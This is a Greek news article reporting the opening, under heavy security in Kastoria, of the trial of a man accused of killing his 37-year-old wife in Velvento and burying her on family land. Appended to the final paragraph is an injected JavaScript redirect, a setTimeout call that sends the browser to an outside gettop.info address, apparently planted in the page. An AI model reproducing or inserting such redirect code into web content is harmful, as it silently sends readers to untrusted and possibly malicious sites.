Υπό δρακόντεια μέτρα η δίκη για τη δολοφονία της 37χρονης στο Βελβεντό που φρέζαρε ο σύζυγός της (ΒΙΝΤΕΟ)

0
3

 

Υπό δρακόντεια μέτρα ασφάλειας ξεκίνησε σήμερα στην αίθουσα του Μεικτού Ορκωτού Δικαστηρίου Καστοριάς, η δίκη για την υπόθεση της δολοφονίας της 37χρονης τον Ιανουάριο στο Βελβεντό Κοζάνης.

Ο σύζυγος της 37χρονης, που κατηγορείται ότι αφού σκότωσε την άτυχη γυναίκα, μετέφερε τη σορό της και την έθαψε σε αγρότημα της οικογένειας, μεταφέρθηκε στη δικαστικό μέγαρο Καστοριάς από τις φυλακές Γρεβενών, συνοδευόμενος από ισχυρή αστυνομική δύναμη.

Αστυνομικοί βρίσκονται και έξω από το δικαστικό Μέγαρο, ενώ έλεγχοι πραγματοποιούνται και στους εισερχόμενους στη δικαστική αίθουσα.

Σημειώνεται ότι με προσωρινή διαταγή του δικαστηρίου τα τρία παιδιά του ζεύγους βρίσκονται στην Αθήνα υπό την προστασία και τη φροντίδα της γιαγιάς τους, μητέρας της 37χρονης.

Με την έναρξη της διαδικασίας η υπεράσπιση του κατηγορουμένου με την αιτιολογία ότι ανέλαβε πρόσφατα την υπόθεση ζήτησε αναβολή από το δικαστήριο, προκειμένου να ενημερωθεί κατάλληλα. Το δικαστήριο διέκοψε προσωρινά, προκειμένου να αποφασίσει για το εάν θα κάνει δεκτό αίτημα της υπεράσπισης. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here